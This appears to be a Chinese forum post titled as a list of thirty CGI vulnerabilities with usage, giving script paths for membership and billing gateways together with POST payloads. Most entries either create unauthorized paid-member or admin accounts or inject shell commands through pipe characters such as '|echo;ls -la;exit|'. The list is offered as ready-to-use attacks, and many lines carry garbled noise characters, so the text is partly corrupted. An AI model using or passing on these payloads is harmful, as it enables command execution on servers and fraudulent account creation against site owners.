Cgi-bin 30个漏洞＋使用方法

admin

==============================

/smspass.pl
# p! [. W9 U4 ]+ i' O/ m. Eusername=username&password=password
( m; ?8 Y) w6 a5 c7 s/ \
/index.cgi
( s2 [7 |# |: j8 a# a9 @wei=ren&gen=command

/passmaster.cgi
1 u' f( u! ]4 `9 ]Action=Add&Username=Username&Password=Password
( ?0 C7 [/ S; u) y/ R! f% j- y
1 F% _4 Y, R6 w& Z/accountcreate.cgi
- T2 B+ H! L" R2 o4 u. _/ susername=username&password=password&ref1=|echo;ls|

/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|

7 L8 o: o; P( Q3 r/addusr.pl
6 o% L) i9 ~  c' s& D/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
, q% F/ A( r5 N! d. H9 r
% l) i' ]! y' g* A/ccbill-local.asp
0 j! P% Y2 H2 ]6 V; T  x* ]post_values=username:password
6 D: N, G8 s9 F" n* ^/ k& M. t
/ M5 r$ O$ Q) k/count.cgi
9 B5 N$ E0 p; N) F  r4 npinfile=|echo;ls -la;exit|

0 C2 {1 T  a( V* u  R! P/recon.cgi
" e; E3 ]3 ^. y- n/ o# Z/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
  y$ Q& d" H8 O! p7 `2 S& x# U! k
% \- @2 f5 {$ D0 i7 a; I0 q/af.cgi
_browser_out=|echo;ls -la;exit;|

/modify.cgi
username=username&password=password&expire=30

" Y2 ~) v: R* M& h) P3 `8 K/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|

- H' d8 u. Y" P1 `! \5 Q/gx9passwd.cgi
) C/ x& ?: }1 v5 F$ ecmd=ADD&user=username&pass=password
* g) M1 Z9 A' X- ^% G! n
( Z- j, p: z: F) V' w/ }4 Z( q/probecontrol.cgi
command=enable&username=username&password=password

/recon.cgi
) I0 X. N. \: ksearchoption=3&searchfor=echo;ls -la;exit

+ W) i2 ]: U; p) d$ p7 p/htadd.pl
configfile=|echo; ls -alt; exit

' w3 S3 p$ P' R2 d/gx9passwd.cgi
) {# k0 p) U: S4 L) P8 n4 {: ?cmd=ADD&user=username&pass=password

/ibill*.pl
" j2 [5 K! h& zreqtype=add&authpwd=authpwd&username=username&password=password
- |& G: H5 a7 U' o$ {/ C8 l
6 B1 [/ s. H: l- l/cpay.cgi
9 Q' t% g6 d7 K& Vcommand=add_member&username=username(EMAIL)&password=password(DES)
& ^. f0 q) o* u$ ~) z6 `' j3 f2 X3 V
/globill_ut.cgi
3 r6 ?+ J. K( i7 n0 qdo=add&username=username&password=password&wpassword=password

/usercontrol.cgi
command=enable&username=USER&password=PASS

/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password
8 E8 y) r9 N5 D, r/ L1 o
/addusr.pl
1 H( p# e% I% m7 b: e* Y# p9 vuser=USER&pass=PASS&confirm=PASS

3 r8 ]- N* v, }3 L/pincount.cgi
. ]6 }5 C, a, g8 y# h- z/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
. k, B: E! _8 t6 q6 d9 V+ I: z
( B& t% S/ O1 b' Q  s/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
, l/ ^# m' H5 N) z$ Q3 ^8 \+ Rusername=username&password=password&password2=password&ref1=|echo;ls -al;exit
2 G" b- [- D9 g3 Q* v3 E
, A  u& M7 _/ o' u, @/af.cgi
/env.cgi
ADD+;echo;pwd;exit

  E; x# \$ j! k% U$ o% l  f+ w# @/count.cgi
pinfile=|echo;pwd;exit|
$ t; k: ~4 e& F) x% N. J
) y  Y5 `0 X9 @/recon.cgi
& q; [. j& `* tsearchoption=1&searchfor=|echo;ls%20-al;exit|

5 y; y: g  Y, ^- Q" P* M9 Q/add.cgi
username=username&password=password&expire=30
# u0 x) z5 t" U2 E5 M2 x
==============================